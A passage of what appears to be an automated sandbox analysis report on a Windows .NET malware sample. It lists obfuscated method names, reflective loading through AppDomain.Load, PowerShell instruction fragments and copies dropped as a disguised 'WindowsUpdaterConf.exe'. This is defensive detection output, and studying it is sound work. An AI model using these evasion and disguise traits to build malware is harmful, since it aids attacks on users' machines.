                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: zqbko5LizBSf5zeVhxZwzoKXdCgYLTJLpygcvNVbhjmw1NByAweg3c1HiND4axyvnHQ3bWNCkWqOnItEn2Ae848Sm6pdbu5kq
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: OmjWgTAeGmfM5NH1PU2ayDN2d4BU5PFWyPvCON6jSXMM83Gdj12K4LIpZrP6T7nS System.AppDomain.Load(byte[])
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: zqbko5LizBSf5zeVhxZwzoKXdCgYLTJLpygcvNVbhjmw1NByAweg3c1HiND4axyvnHQ3bWNCkWqOnItEn2Ae848Sm6pdbu5kq System.AppDomain.Load(byte[])
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.cs.Net Code: zqbko5LizBSf5zeVhxZwzoKXdCgYLTJLpygcvNVbhjmw1NByAweg3c1HiND4axyvnHQ3bWNCkWqOnItEn2Ae848Sm6pdbu5kq
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0628BF50 push es; retn 28E4h0_2_0628ECA8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06283943 push eax; iretd 0_2_06283944
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04854277 push ebx; ret 6_2_048542DA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04856338 push eax; ret 6_2_04856341
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04853A78 push ebx; retf 6_2_04853ADA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04C66348 push eax; ret 9_2_04C66351
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C58C08 push ebp; ret 9_2_08C58C12
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C58C1F push esi; ret 9_2_08C58C22
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C56DA0 push ds; ret 9_2_08C56DDA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C58BCD push edx; ret 9_2_08C58BD2
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C58BD8 push edi; ret 9_2_08C58C42
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C56BE8 pushfd ; ret 9_2_08C56BE9
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C58BF1 push edx; ret 9_2_08C58BF2
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C577F0 push eax; retf 9_2_08C577F1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08C58B68 push eax; ret 9_2_08C58B92
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00A6633D push eax; ret 12_2_00A66351
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_072A0CE8 push es; iretd 12_2_072A0E18
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_072A0A4C pushad ; iretd 12_2_072A0A59
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_072A08B8 pushad ; iretd 12_2_072A0A59
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_064DBF50 push es; retn 4DE4h14_2_064DECA8
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 14_2_064D3943 push eax; iretd 14_2_064D3944
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00BB42C8 push ebx; ret 20_2_00BB42DA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00BB636D push eax; ret 20_2_00BB6371
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00BB3A63 push ebx; retf 20_2_00BB3ADA
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_00D7432E push esi; iretd 22_2_00D7432F
                            Source: C:\Users\user\AppData\Roaming\file.exeCode function: 22_2_05743943 push eax; iretd 22_2_05743944
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 27_2_05993943 push eax; iretd 27_2_05993944
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_0619BF50 push es; retn 19E4h30_2_0619ECA8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 30_2_06193943 push eax; iretd 30_2_06193944
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_0656BF50 push es; retn 56E4h33_2_0656ECA8
                            Source: C:\Users\user\WindowsUpdaterConf.exeCode function: 33_2_06563943 push eax; iretd 33_2_06563944
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.csHigh entropy of concatenated method names: 'K9XA0MuQRxg5yw0QUDlsjlgxO7uy6vmvwrQXX33aSN4BrPXjQMVx6dLo4', 'JmARQ86YpVqvhJkos4MRrtrif2JJPZ7VTcSxMhJswqNxoyFdm0sUuIsJ2', 'f2uAebM4xgQY5lPbuDQfm9EZmvNRKNLGxMYc8U3110BcaBCZh4vhFwiIr', '_4ki5WBWFixhnDNZRyD3kowsNZjWTQNOwUPMU20MrVPozCz9l6ZPyCnUI2'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, pfAXNycGHAG9kHhBkDfdq9Qh.csHigh entropy of concatenated method names: 'Hy0GpbxnyfIjTFLUbwTTgUtH', 'xL9WCTr1T3K8BYRupgvAuUFC', 'yQISydyksn5WB9ow7uWZGfII', 'nicnsxzRwvvu1DJ3', '_3OeJQFgMVdXCU1xw', 'jM69T1JoWmRFNFVz', '_76C2w2PDBor8TUdJ', '_653n0ryEbprJKMX6', '_7ev324fcMk6FxYJI', 'UBQ6daJQFfse7pu9'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, 0anWj12JiqHi3ExnbtL4gRxKQ9dvhPcB3yf9stajqoMVQj0.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'RN917BecpTlt3F8WjhUCNP4ZFcccUYyhzcn5x9MPLKct98vzEeT03kis5', '_1RgY3FeOTFA32tsnQFdUG701mo6G95leERty4TzJie8PMJ5ByKHI8c3uc', 'Mpih3O2Pj1rQldUeFi2NwQVgjl29On567DDgSUSMDtoRyrJjhmpt7jktt', 'NLDIfNaPp8NA5VyaOGm3k8jX95BHcMSKIhZv8T90W253F0zQfUZT2mDUQ'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.csHigh entropy of concatenated method names: 'svIVH2g0GRQQ1hJ8WZJ7daHF14Qgd7czCpgJHffgyX6OFduLTXs5erCcrrSHMyYdMR3itRhnJfZrX1fzyZ', 'XvkThZKqBYrKIAQAyU4HpVxkXsSu45yxeaO7ilZNtsZsnBky3L4vAZFBiXRfnqCPaC8UMoVfHH1zZDmG5f', 'yFTrsmMel7VjSIKCYJ2VMuVBpaNcqvSFFxqlzWTDwLrJ9gOEaDxQdNT0XjXVX2ZiXtAFdZrYIHdIwLE9ab', 's1nHvyPBy2ZgyEt7QkPceAsyhKYYqDn63hEgAq9b3kkxeGFH9VWufCbERXe0lcgrGPxuGwEHWjjkb9b2NZ', 'nKodDjI2B5tzJ2yJx6AftFzt6Nq9T6hEeZNN7IhiC9mzhWb0MhwyZdjIbHlCumV7IBPmdPt5hbtZ6UjiQT', 'tnapOiSTs3cqX6BBSBu3zPZ1H3j17Yp4JW5QgiKf6rOxjmUqT5cK4HbVwdsKhShRDNZoO8OERkj6URTNBI', 'VAkgx9sLYTHkJSLkY5JTGhIeBMQCULipbGNCrgtTMWapsy8IIgmFrsU4BbyVQsjZljMS94Iqrl9O1b2wIi', 'b6RXb4BKZRzYeoYFWsftu0oKMA9PzhPZPf3xQI4R5htgzzJzeF9AWF0nQ6oek9xwg3rGRV1fSzMRwQFNO6', 'MzcUqZzrRrXbeDcP4IefqyUDhjICNJqxysm51AlaPF9couSRUydPAUUOu5DBGPJjzIIyHoqIqahWKrigkw', 'VqEZfeqhL4QeYglvZAF0uNzM6l6vkcNIDUGUUREGXsuYtw2lzi59NZTzagYOr2FoFgi5q9uTRn80tGP61s'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, tMAO7r0WOHxgOVEd4d8e72ywS3khYGrhlo8SRKKdrOhg6nZsRJKiewQT6qQGnKLIg1Gk86nO2p2g9qkpwi1mCSLBSK0tiIHqe.csHigh entropy of concatenated method names: 'Ca8zTJzOXdF1XSQ4Uk0FpAFOo2rQu3qbkh4a0jpCsszx69orcafgt1pMRuFysXcXVAvdzJfHK63BB3tIGhrx4UKJ9mCvGLImf', 'BsCxD3ZFBlqUAqkw03C6OFawqiuJh3FVrNq0AgUWOGTQr7W8KOdwxqAwhFyto07VH5QDaNuaDs', '_9g2PIVvmky60SRYqFTZNlEQzWl9HFnjfpjn79uczsnelcSLVM6ibgvMmvV2m4RueNeX1KUoTUi', 'IKtuZHsgDWC23EuZTzfTYEfHyq1TlxU1yd8VTwwOo2fzonMq2bCGGwrfJfCjLyuUFv7a14FKK9', 'wAdgfIPx5SYAlzcBKO4ZSEn5QqcenKawSCKd2N1ZgXAT8Tpvf2HiBLcyfE4CLe02H6JhqLYlNF'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, 1BnXPKwu76MD4Cb65M8LmHIXPTlBOv59WZ1m6mGJAeUj7kFFjXtQiFRcNjc82JltgpD9ADnTthvnNFa.csHigh entropy of concatenated method names: 'jIAts4J7SShl0SnZCZ2gkzALnqqFAo4knxgDjyFyJsZy1KIf1yHykqF6IZmxWb4Oh5PhFHKTxcMFkgS', '_5eoEBBaBTWXSnJuepoNs4TcTHnr3VaddTKrQTF7zHuQ4ieGz5VTy1TjfXgqAEu05O2p7B8SnuZQTXTN', '_8sQh8EFYtgGY75yOMZGvjiNpOx2woGZ8rtJtHNHiKriCeH5BWwPFnGGXGTc1lD6zS4fv8jqc0UjGS8Q', 'BKBKCNODvQeLG22I0jqWMaps9uX5tsbUkthYpvVUSXWA2vy8ElYjtzZ6Y1fsnNmCR6UqEg78PYVKtHm', '_5elUGeMwq7NNd8a51NAP90UUpqyL2LrjGXRB8Baz8Vl3nYZ3m7hB0eKQzUtvyqQafhXIgEosJGyTF5m', 'mGssgndyPnxcE0LtnEdfXXZvvXiLgd94fm2h93iPrXnLEBQ4tsxxVwLgLUmaZFclPRPkCyq4wullJcP', 'mmhaWzq3hbZDQtQfBmi6A8xsuojtIjpwkYcuSyKWQpGn8eeV49dKJNKyspXSyPoHnlpCJbEEajwDCSD', 'Qyn7BLsbvR7PFqxIiNVP1v0Q1fRYiLQ3u9c8XODGPmTC3z983bEsXg5aGSMYT8tIr8FQikYx1E1nSQY', 'rczk6Yu4zaajD1rmtzB9W3U5xfWVLQc0dZ9gHgkoolEU8t8kcGKnqIEQW9sbreo5KK9YXalLfdWyor4', 'oWOoQ0Q4mLJozToPqQOyElta7Iv7g8WQknxxwudkN1nxvdtcWtsHoKdZTs58Bzrxysq95A8Uf3RiImG'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, k8oQBqD1FfB24uQwQAjscQBcsRADnbcSlYbhctv49NQ6vnVNBf7Ya7d8yz6WlHsmiF1cUrk5wKP0Ck0EhJaUIVsGRyNgB9EqY.csHigh entropy of concatenated method names: 'PURSdKwf6uUyuIeo01L2wrL5YXcCJwixZhm674K30OY5BSgs3bqlEy7laHmEUyKJbssQbefNGkLpdhY3qbUxPJoFdHC8GIG51', 'L5841UcNRl6sDIKgIUn3k62zuYMJHDch8788FKzYRQFFOUztBjvifBP2qT8N9IoOGAnVTSiitdywd3xyNAQhJQZG5qaN8fzId', 'ra1ye9xo1HKMcEldMPxQsQP6MYWDbRGeaR9jjEdpj4oHwTnSXZisafqZoHJuduP461A7BqNDnqxosaRnqz83lKIRGNuwDqgfF', 'qukIAc99XGERtJeVCLU6USjGcFvgJkBC5LR9CG6P39hljCvzMCa2ZZUDAh0jH1cp2ybshyw0BgGNqF6qLJdRF3Qjjr8Qv0h3k', 'pYTsImnQKLmW3xKKnPrcg35rY9B4i7SlFf0KkFgEUlsXt4FsAarRYyrwyBtoGBfMMams8IHUQHxxK6RnLRo3baRsA6hsti8l5', 'O30rLSFEndQTifNrEdMCJg4ZFU3JKpzjswfnYbvdDKQKolSQKiGrPlNPxrcqdc2Rk0lGuhxO4mn3W7h9UWxUNaRyRvkMpzj5o', 'tRZmsk83jO6u1QL1ZvHrVPrzQe3b35wwRa6PdBHZkAJsJjjLWup4g6eNPMwBmzli1LqREsOVzV9aDhDQeuZ7isup9XyjeuWbs', 'ebOrWyYhaOZ9d7RJL2HfVfNxqSknUkHnvcMkdbLk3d8QaRnKq2jVXnNXzOuy8GLIfV4DKNpWX9N5v5KsFs2fztNI6GfRjoX3V', '_0OjaokSk0Jw2HMEf8RKTQlO4kotXk9ZR8ZhunU18WGsvtNiWdTrBvfCqTBVgLwLuyFQINmEhzNqytgMfn3', 'IolwZpH1HLIXDIPe24xVknOEjyfwUu6y82DwGcLuyJxiMcYNZjBhCw0dZZx5fqQPNCLn949YUJOPHzjRk1'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.csHigh entropy of concatenated method names: 'Lhw0EuwZ1fYIXLm5zrgpgRUbVTHXSDF2UCl7sGRGNiKZGMaC27UtCm3qDwC0ozmQ', 'OmjWgTAeGmfM5NH1PU2ayDN2d4BU5PFWyPvCON6jSXMM83Gdj12K4LIpZrP6T7nS', 'G8yIH49uHGWslxXVEd59mIK5OUM3NiHV3KycjgvoyP5SJ2cB6Ytwzi9pIVfYU97n', 'ZekE3xuuJcMYGquyAUKRuDmYetQzqS06YpX1KnoRr9qre5jhasUlcExY45yFYOLS', 'RBvskQfc3AMcmgirQvncxeQJmjmgL7YQ9wUr2I8WJ66RnIqfjOnevV11hsmxUJgR', 'f27hxCph9imrmui07eYZcWhaU1AMkeEzwgi4CyHQVeVpnmYkk0YqUkWyH7kUhKn0', 'T4J9MR6iuMf1VdM9IW27cNsEc15XpDFbjQ1ZWWz00SeCAUibCNaBGdPXYGplydzA', '_7GI4uKlZRmnHlcjXo4KgOrdzuxBpaTwB9sOr8xhMgBMQp03dZ8lwkpUs6EtCEbgy', 'js9mCAIRcVKsY7NmghkvjOTA96W5z24CKxGN1hjyzZzD5llhBusXMY0MAFNbej4KswDAGE5ZpKlk9fynf6c18hdZ0UgLYTGO0', 'sP9vXYu5dJDBXVSoG3JOQWdBdVjvv2yf1yp5J1hZnpH60pPk2kYAO8pNuMAsXoEm9fdJzi2VVNywQ0VZnwMWSwgj7hF6uwtdF'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, ub7IeQ5sqWntl1qadx7oq8YPwaBWDRNX9iR60l23xp96M8SJ85dQZQ0Jlyoi3nwkDA9WIIBOt0Hb0HYwHI.csHigh entropy of concatenated method names: 'H2RSsZFKRrHRT65cfj1Xt86ijqMLzBbhqqyo9tS3BTuyFl36DNaS74BiNpx9RXeFVIr0gOFUpzoNkqevAK', 'm7jKQ9artMQi15JY', 'cC6KrzcON6oUu94C', 'xlFJfWFmLDceh0wF', 'IV62WVx1P90yMgcl'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, Va0ddDu00dYIoqkpI8007fKCWGNarJAgL6NkEIvTK3m30bT2d93l8liwfCCoamGT.csHigh entropy of concatenated method names: 'ltdvSTmuDwBFxehfhJITmk7EjiC5LtSjvbgKwuUpdQh9Sh9IDPHrvBVnvmOmDjRI', 'OzPzG0vNO9oBkRBCfVLBP3EqlDUV3EoLZznjtrjt7nZtyUeWKNPez4kBqSY9ObiU', 'uodld5Psb4FuTMXQf6h7IUWD6PTMuS2Qc7TBCPiTqUieoTGTmRKHOPncvTJic8rB', 'u1WayCkYPUkQZgvoxrdU33C45lKbkZr044i1dl9TxVWnUpRCo1c2bpBZKyfTvxpa', 'uB0MHsnOyEIA2Wrc8yUc6BijIDBv6tPvlQ2YGbJaEJmL9jeiVkNss7RyTRwOoWB8', 'WLW7MpcGbsiFbXTpRmancjelVxRWkFNRZbTbYhbrRKoLsPlM5Yqi46CRoqhzZdSu', 'Kk1RT2LIUI7b6bfYb8aSFepH5gkeFIO4somhtQ50uLzx31p0mGX60fXO9yKICQp0', 'Vk2sUIA1bkvO8AhgrzBdwWMlWz0YBDwolSLiYjRWqygIAb3yH3X5DL36Xh2SynWC', 'XgdUNkMUXEXGC2TVTReadLd0ZlSGfqldf228i9ggBJH3QVbMB0ybcOg8h5B8q1pM', 'plvpD1pR7iBdqDimQRP5q9IEu8BUfF9RjWsg0JDOrhivlMC7fsfXUeR5JV6SuHGD'
                            Source: 0.2.file.exe.3719ccc.0.raw.unpack, d46Zv2qYbaQJDMbZ7Xt1F2PnAlaWbc40N1LuG79B9IpFWHdOqXitnmSGc4QjuU9D7djj6HwceM2y3rralb.csHigh entropy of concatenated method names: 'W1SH7JjcsI8sTnwKEy5ILvF0kL2cI0ZyQY6ygglXZsU3AqHKHFLb5nTJMzn1opEmHsqhnssg8igxNeTjqV', 'Bc8aYFCKF5DlIWuz0WE9up88nhWMEFbsJWzwk8E1IbVfAFN3LVm6HRwfQBq1HyNFqog2785atf61STkiA4', 'sxCXhjmnGtAQ7QpCyXm6hPTO0WsFjg7RxaeRT87XPU9lJIBzdNXhy01KK7wlmU5GdENw8yZkuTKyBL8cpw', 'C24mPs6zaxpv5tbRh4agFza8K3WvAQU9CRVWmTlOYUKp4MTfUxlFze2YOxO4evCawHj5xbwv0sYz1F12w1', '_8aGks2WbjOcupJTr0kPmVoHQknH4VTxWv6BUfJhJ99GLXd7ytrXvFtow9Pnas76JTrSuArqfYQ', 'rLHAojLGqYxJ2rxj', '_0xB1uBLsDSIBpH4x', 'mXJA63SBxx6jb4pQ', '_32sqqCGc2QDZqDpG', 'nQSinV7QBHDbQCpk'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, JGZNkhPYy51rKLOP0bhlu4smsylhhcdLgDbJFtAZtDL8up910PQ3DgJmflK3VNrQlP6UtXkQk3ItloK.csHigh entropy of concatenated method names: 'K9XA0MuQRxg5yw0QUDlsjlgxO7uy6vmvwrQXX33aSN4BrPXjQMVx6dLo4', 'JmARQ86YpVqvhJkos4MRrtrif2JJPZ7VTcSxMhJswqNxoyFdm0sUuIsJ2', 'f2uAebM4xgQY5lPbuDQfm9EZmvNRKNLGxMYc8U3110BcaBCZh4vhFwiIr', '_4ki5WBWFixhnDNZRyD3kowsNZjWTQNOwUPMU20MrVPozCz9l6ZPyCnUI2'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, pfAXNycGHAG9kHhBkDfdq9Qh.csHigh entropy of concatenated method names: 'Hy0GpbxnyfIjTFLUbwTTgUtH', 'xL9WCTr1T3K8BYRupgvAuUFC', 'yQISydyksn5WB9ow7uWZGfII', 'nicnsxzRwvvu1DJ3', '_3OeJQFgMVdXCU1xw', 'jM69T1JoWmRFNFVz', '_76C2w2PDBor8TUdJ', '_653n0ryEbprJKMX6', '_7ev324fcMk6FxYJI', 'UBQ6daJQFfse7pu9'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, 0anWj12JiqHi3ExnbtL4gRxKQ9dvhPcB3yf9stajqoMVQj0.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'RN917BecpTlt3F8WjhUCNP4ZFcccUYyhzcn5x9MPLKct98vzEeT03kis5', '_1RgY3FeOTFA32tsnQFdUG701mo6G95leERty4TzJie8PMJ5ByKHI8c3uc', 'Mpih3O2Pj1rQldUeFi2NwQVgjl29On567DDgSUSMDtoRyrJjhmpt7jktt', 'NLDIfNaPp8NA5VyaOGm3k8jX95BHcMSKIhZv8T90W253F0zQfUZT2mDUQ'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, 9a0DjQ85k3MQx9Tn1q3XhVQg0xirCWFQe8q2lNoCpBl3P92foFHJ9LE21sIAHC9VEkE0lAd4azo8aU2gNo.csHigh entropy of concatenated method names: 'svIVH2g0GRQQ1hJ8WZJ7daHF14Qgd7czCpgJHffgyX6OFduLTXs5erCcrrSHMyYdMR3itRhnJfZrX1fzyZ', 'XvkThZKqBYrKIAQAyU4HpVxkXsSu45yxeaO7ilZNtsZsnBky3L4vAZFBiXRfnqCPaC8UMoVfHH1zZDmG5f', 'yFTrsmMel7VjSIKCYJ2VMuVBpaNcqvSFFxqlzWTDwLrJ9gOEaDxQdNT0XjXVX2ZiXtAFdZrYIHdIwLE9ab', 's1nHvyPBy2ZgyEt7QkPceAsyhKYYqDn63hEgAq9b3kkxeGFH9VWufCbERXe0lcgrGPxuGwEHWjjkb9b2NZ', 'nKodDjI2B5tzJ2yJx6AftFzt6Nq9T6hEeZNN7IhiC9mzhWb0MhwyZdjIbHlCumV7IBPmdPt5hbtZ6UjiQT', 'tnapOiSTs3cqX6BBSBu3zPZ1H3j17Yp4JW5QgiKf6rOxjmUqT5cK4HbVwdsKhShRDNZoO8OERkj6URTNBI', 'VAkgx9sLYTHkJSLkY5JTGhIeBMQCULipbGNCrgtTMWapsy8IIgmFrsU4BbyVQsjZljMS94Iqrl9O1b2wIi', 'b6RXb4BKZRzYeoYFWsftu0oKMA9PzhPZPf3xQI4R5htgzzJzeF9AWF0nQ6oek9xwg3rGRV1fSzMRwQFNO6', 'MzcUqZzrRrXbeDcP4IefqyUDhjICNJqxysm51AlaPF9couSRUydPAUUOu5DBGPJjzIIyHoqIqahWKrigkw', 'VqEZfeqhL4QeYglvZAF0uNzM6l6vkcNIDUGUUREGXsuYtw2lzi59NZTzagYOr2FoFgi5q9uTRn80tGP61s'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, tMAO7r0WOHxgOVEd4d8e72ywS3khYGrhlo8SRKKdrOhg6nZsRJKiewQT6qQGnKLIg1Gk86nO2p2g9qkpwi1mCSLBSK0tiIHqe.csHigh entropy of concatenated method names: 'Ca8zTJzOXdF1XSQ4Uk0FpAFOo2rQu3qbkh4a0jpCsszx69orcafgt1pMRuFysXcXVAvdzJfHK63BB3tIGhrx4UKJ9mCvGLImf', 'BsCxD3ZFBlqUAqkw03C6OFawqiuJh3FVrNq0AgUWOGTQr7W8KOdwxqAwhFyto07VH5QDaNuaDs', '_9g2PIVvmky60SRYqFTZNlEQzWl9HFnjfpjn79uczsnelcSLVM6ibgvMmvV2m4RueNeX1KUoTUi', 'IKtuZHsgDWC23EuZTzfTYEfHyq1TlxU1yd8VTwwOo2fzonMq2bCGGwrfJfCjLyuUFv7a14FKK9', 'wAdgfIPx5SYAlzcBKO4ZSEn5QqcenKawSCKd2N1ZgXAT8Tpvf2HiBLcyfE4CLe02H6JhqLYlNF'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, 1BnXPKwu76MD4Cb65M8LmHIXPTlBOv59WZ1m6mGJAeUj7kFFjXtQiFRcNjc82JltgpD9ADnTthvnNFa.csHigh entropy of concatenated method names: 'jIAts4J7SShl0SnZCZ2gkzALnqqFAo4knxgDjyFyJsZy1KIf1yHykqF6IZmxWb4Oh5PhFHKTxcMFkgS', '_5eoEBBaBTWXSnJuepoNs4TcTHnr3VaddTKrQTF7zHuQ4ieGz5VTy1TjfXgqAEu05O2p7B8SnuZQTXTN', '_8sQh8EFYtgGY75yOMZGvjiNpOx2woGZ8rtJtHNHiKriCeH5BWwPFnGGXGTc1lD6zS4fv8jqc0UjGS8Q', 'BKBKCNODvQeLG22I0jqWMaps9uX5tsbUkthYpvVUSXWA2vy8ElYjtzZ6Y1fsnNmCR6UqEg78PYVKtHm', '_5elUGeMwq7NNd8a51NAP90UUpqyL2LrjGXRB8Baz8Vl3nYZ3m7hB0eKQzUtvyqQafhXIgEosJGyTF5m', 'mGssgndyPnxcE0LtnEdfXXZvvXiLgd94fm2h93iPrXnLEBQ4tsxxVwLgLUmaZFclPRPkCyq4wullJcP', 'mmhaWzq3hbZDQtQfBmi6A8xsuojtIjpwkYcuSyKWQpGn8eeV49dKJNKyspXSyPoHnlpCJbEEajwDCSD', 'Qyn7BLsbvR7PFqxIiNVP1v0Q1fRYiLQ3u9c8XODGPmTC3z983bEsXg5aGSMYT8tIr8FQikYx1E1nSQY', 'rczk6Yu4zaajD1rmtzB9W3U5xfWVLQc0dZ9gHgkoolEU8t8kcGKnqIEQW9sbreo5KK9YXalLfdWyor4', 'oWOoQ0Q4mLJozToPqQOyElta7Iv7g8WQknxxwudkN1nxvdtcWtsHoKdZTs58Bzrxysq95A8Uf3RiImG'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, k8oQBqD1FfB24uQwQAjscQBcsRADnbcSlYbhctv49NQ6vnVNBf7Ya7d8yz6WlHsmiF1cUrk5wKP0Ck0EhJaUIVsGRyNgB9EqY.csHigh entropy of concatenated method names: 'PURSdKwf6uUyuIeo01L2wrL5YXcCJwixZhm674K30OY5BSgs3bqlEy7laHmEUyKJbssQbefNGkLpdhY3qbUxPJoFdHC8GIG51', 'L5841UcNRl6sDIKgIUn3k62zuYMJHDch8788FKzYRQFFOUztBjvifBP2qT8N9IoOGAnVTSiitdywd3xyNAQhJQZG5qaN8fzId', 'ra1ye9xo1HKMcEldMPxQsQP6MYWDbRGeaR9jjEdpj4oHwTnSXZisafqZoHJuduP461A7BqNDnqxosaRnqz83lKIRGNuwDqgfF', 'qukIAc99XGERtJeVCLU6USjGcFvgJkBC5LR9CG6P39hljCvzMCa2ZZUDAh0jH1cp2ybshyw0BgGNqF6qLJdRF3Qjjr8Qv0h3k', 'pYTsImnQKLmW3xKKnPrcg35rY9B4i7SlFf0KkFgEUlsXt4FsAarRYyrwyBtoGBfMMams8IHUQHxxK6RnLRo3baRsA6hsti8l5', 'O30rLSFEndQTifNrEdMCJg4ZFU3JKpzjswfnYbvdDKQKolSQKiGrPlNPxrcqdc2Rk0lGuhxO4mn3W7h9UWxUNaRyRvkMpzj5o', 'tRZmsk83jO6u1QL1ZvHrVPrzQe3b35wwRa6PdBHZkAJsJjjLWup4g6eNPMwBmzli1LqREsOVzV9aDhDQeuZ7isup9XyjeuWbs', 'ebOrWyYhaOZ9d7RJL2HfVfNxqSknUkHnvcMkdbLk3d8QaRnKq2jVXnNXzOuy8GLIfV4DKNpWX9N5v5KsFs2fztNI6GfRjoX3V', '_0OjaokSk0Jw2HMEf8RKTQlO4kotXk9ZR8ZhunU18WGsvtNiWdTrBvfCqTBVgLwLuyFQINmEhzNqytgMfn3', 'IolwZpH1HLIXDIPe24xVknOEjyfwUu6y82DwGcLuyJxiMcYNZjBhCw0dZZx5fqQPNCLn949YUJOPHzjRk1'
                            Source: 0.2.file.exe.372e50c.1.raw.unpack, J5e1oSdTyjHJTArIKP3ktQ0lfAAlVsLA2NCnVW2MwPfQq52qM1YvhW3yGP76923m.csHigh entropy of concatenated method names: 'Lhw0EuwZ1fYIXLm5zrgpgRUbVTHXSDF2UCl7sGRGNiKZGMaC27UtCm3qDwC0ozmQ', 'OmjWgTAeGmfM5NH1PU2ayDN2d4BU5PFWyPvCON6jSXMM83Gdj12K4LIpZrP6T7nS', 'G8yIH49uHGWslxXVEd59mIK5OUM3NiHV3KycjgvoyP5SJ2cB6Ytwzi9pIVfYU97n', 'ZekE3xuuJcMYGquyAUKRuDmYetQzqS06YpX1KnoRr9qre5jhasUlcExY45yFYOLS', 'RBvskQfc3AMcmgirQvncxeQJmjmgL7YQ9wUr2I8WJ66RnIqfjOnevV11hsmxUJgR', 'f27hxCph9imrmui07eYZcWhaU1AMkeEzwgi4CyHQVeVpnmYkk0YqUkWyH7kUhKn0', 'T4J9MR6iuMf1VdM9IW27cNsEc15XpDFbjQ1ZWWz00SeCAUibCNaBGdPXYGplydzA', '_7GI4uKlZRmnHlcjXo4KgOrdzuxBpaTwB9sOr8xhMgBMQp03dZ8lwkpUs6EtCEbgy', 'js9mCAIRcVKsY7NmghkvjOTA96W5z24CKxGN1hjyzZzD5llhBusXMY0MAFNbej4KswDAGE5ZpKlk9fynf6c18hdZ0UgLYTGO0', 'sP9vXYu5dJDBXVSoG3JOQWdBdVjvv2yf1yp5J1hZnpH60pPk2kYAO8pNuMAsXoEm9fdJzi2VVNywQ0VZnwMWSwgj7hF6uwtdF'
